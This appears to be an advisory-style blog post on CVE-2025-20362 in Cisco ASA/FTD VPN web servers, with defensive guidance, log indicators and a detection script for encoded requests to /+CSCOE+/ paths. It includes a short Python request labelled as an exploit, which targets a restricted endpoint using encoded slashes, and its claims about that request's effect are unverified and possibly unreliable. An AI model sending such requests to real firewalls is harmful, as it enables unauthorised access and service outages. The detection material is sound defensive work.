Update (November 5, 2025): Cisco has identified a new attack variant targeting Cisco Secure ASA and FTD devices with vulnerable software (CVE-2025-20333 & CVE-2025-20362). Attackers can remotely crash (reload) unpatched devices, causing denial of service (DoS). Cisco urges all customers to upgrade right away. This article covers how the exploit works, shares sample payloads, references, and explains the fix.

What is CVE-2025-20362?

CVE-2025-20362 is a critical vulnerability in the VPN web server component of Cisco Secure Firewall Adaptive Security Appliance (ASA) and Cisco Secure Firewall Threat Defense (FTD). It allows attackers—without any authentication—to access otherwise restricted VPN-related URLs.

How the Attack Works

Attackers can send crafted HTTP(S) requests to the VPN web interface on a vulnerable ASA/FTD device. The web server fails to properly validate certain user inputs, letting attackers sneak into restricted areas, or worse—trigger a reload.

Example Exploit Step

Suppose your ASA or FTD appliance is accessible at https://vpn.acme-corp.com/.

An attacker can send a GET request targeting a specific VPN URL endpoint, such as /+CSCOE+/portal.html, which should normally require authentication. Using crafted request payloads like double encoding and header manipulation, the attacker bypasses standard access controls.

Simple Exploit Example (Python)

import requests

target = "https://vpn.acme-corp.com"
endpoint = "/+CSCOE+/portal.html"
headers = {
    "User-Agent": "Exploit-Scanner",
    "Cookie": "webvpnlogin=; webvpnlang=en"
}

# Percent-encode the slashes in the endpoint path (the request-encoding trick described above)
exploit_url = f"{target}/{endpoint.replace('/', '%2f')}"

# Send the request; verify=False skips TLS certificate validation
response = requests.get(exploit_url, headers=headers, verify=False)
print("HTTP Status:", response.status_code)
print("Response Preview:\n", response.text[:300])

If vulnerable, the web server may respond with the restricted content or, depending on crafted requests, cause the device to reload (crash), resulting in a DoS.

Signs of Exploitation

- Unexpected reloads/reboots without crashinfo logs

Check your ASA/FTD logs for patterns similar to the following:

%ASA-2-105041: (Primary) Authentication failed for user from 203.0.113.42/63421 to xxx.xxx.xxx.xxx/443
%ASA-4-444400: Device reload due to unknown exception

Cisco Security Advisory:

CVE-2025-20362 Detail & Patch Info

Exploit Database:

CVE-2025-20362 at NVD

For the list of fixed software, see the Cisco advisory’s "#fs" section.

Restrict Web VPN Access:

Until patching is complete, limit exposure of the VPN web interface. Use access lists (ACLs) to restrict the management plane to trusted IPs.

Monitor for Abuse:

Monitor logs and network traffic for suspicious access to /+CSCOE+/ or other known restricted endpoints.
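The following script is an added example (it is not from the article or from Cisco) that turns the two monitoring points above, the syslog patterns under "Signs of Exploitation" and requests for /+CSCOE+/ paths, into a small detector. It parses the two ASA message IDs quoted above, counts authentication failures per source address, counts reload messages, and flags requests whose path resolves to the restricted prefix after percent-decoding (including the double-encoded form mentioned earlier). The log lines are constructed samples, and the access-log line format (client IP first, then "METHOD path" in quotes) is an assumption about whatever front-end proxy or capture tool feeds the URL data; adjust ACCESS_RE to your own source.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Message IDs quoted in the article's "Signs of Exploitation" section.
AUTH_FAIL_ID = "%ASA-2-105041"
RELOAD_ID = "%ASA-4-444400"

# Restricted WebVPN path prefix named in the article (compared case-insensitively).
RESTRICTED_PREFIX = "/+cscoe+/"

# How many authentication failures from one source count as a probe (tunable).
AUTH_FAIL_THRESHOLD = 3

ASA_MSG_RE = re.compile(r"(?P<msgid>%ASA-\d-\d+):\s*(?P<body>.*)")
ENDPOINTS_RE = re.compile(
    r"from\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3})/\d+\s+to\s+(?P<dst>\d{1,3}(?:\.\d{1,3}){3})/(?P<dport>\d+)"
)
# Assumed access-log format: client IP, then "METHOD path" in quotes.
ACCESS_RE = re.compile(r'^(?P<src>\d{1,3}(?:\.\d{1,3}){3}) .*?"(?:GET|POST|HEAD) (?P<path>\S+)')

# Constructed sample lines (not real telemetry), modelled on the formats above.
SAMPLE_LOGS = """
%ASA-6-302013: Built inbound TCP connection 4711 for outside:198.51.100.7/51234 (198.51.100.7/51234) to identity:192.0.2.1/443 (192.0.2.1/443)
%ASA-2-105041: (Primary) Authentication failed for user from 203.0.113.42/63421 to 192.0.2.1/443
%ASA-2-105041: (Primary) Authentication failed for user from 203.0.113.42/63422 to 192.0.2.1/443
%ASA-2-105041: (Primary) Authentication failed for user from 203.0.113.42/63423 to 192.0.2.1/443
%ASA-2-105041: (Primary) Authentication failed for user from 198.51.100.7/50001 to 192.0.2.1/443
203.0.113.42 - - [05/Nov/2025:10:00:01 +0000] "GET //%2f+CSCOE+%2fportal.html HTTP/1.1" 200 512
203.0.113.42 - - [05/Nov/2025:10:00:02 +0000] "GET /%252f+CSCOE+%252flogon.html HTTP/1.1" 200 512
198.51.100.7 - - [05/Nov/2025:10:00:03 +0000] "GET /favicon.ico HTTP/1.1" 404 0
%ASA-4-444400: Device reload due to unknown exception
"""


def normalize_path(path):
    """Percent-decode up to three times (covers single and double encoding),
    drop any query string, collapse repeated slashes and lowercase."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.split("?", 1)[0]
    path = re.sub(r"/{2,}", "/", path)
    return path.lower()


def is_restricted_path(path):
    """True when the request, after normalization, targets the restricted prefix."""
    return normalize_path(path).startswith(RESTRICTED_PREFIX)


def analyze(lines):
    """Scan log lines and return a report of the indicators the article lists."""
    auth_failures = Counter()
    restricted_hits = defaultdict(list)
    reloads = 0
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        m = ASA_MSG_RE.search(line)
        if m:
            msgid, body = m.group("msgid"), m.group("body")
            if msgid == AUTH_FAIL_ID:
                ep = ENDPOINTS_RE.search(body)
                if ep:
                    auth_failures[ep.group("src")] += 1
            elif msgid == RELOAD_ID:
                reloads += 1
            continue
        a = ACCESS_RE.match(line)
        if a and is_restricted_path(a.group("path")):
            restricted_hits[a.group("src")].append(a.group("path"))
    # A source is suspicious if it crossed the failure threshold or touched a restricted path.
    suspicious = {src for src, n in auth_failures.items() if n >= AUTH_FAIL_THRESHOLD}
    suspicious |= set(restricted_hits)
    return {
        "auth_failures": dict(auth_failures),
        "restricted_hits": dict(restricted_hits),
        "reloads": reloads,
        "suspicious_sources": sorted(suspicious),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOGS.splitlines())
    for key, value in report.items():
        print(f"{key}: {value}")
```

On the constructed sample the report attributes three failed authentications and two restricted-path requests to 203.0.113.42, counts one reload, and lists only that address as suspicious; 198.51.100.7 stays below the threshold and only requested a public path. Feed the function your real syslog export and proxy logs, and treat a reload message that follows bursts from the same source as the correlation worth paging on.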

Conclusion

CVE-2025-20362 is a severe vulnerability that can permit attackers to bypass authentication and potentially crash your Cisco ASA/FTD devices remotely. This is especially dangerous as attackers can chain techniques (as seen in new variants since Nov 2025) to take down your network perimeter or abuse VPN access.

Act now:

- Restrict management interfaces

For continued updates, always monitor the Cisco Security Portal and subscribe to product advisories.

Timeline

Published on: 09/25/2025 16:15:32 UTC
Last modified on: 11/06/2025 14:51:19 UTC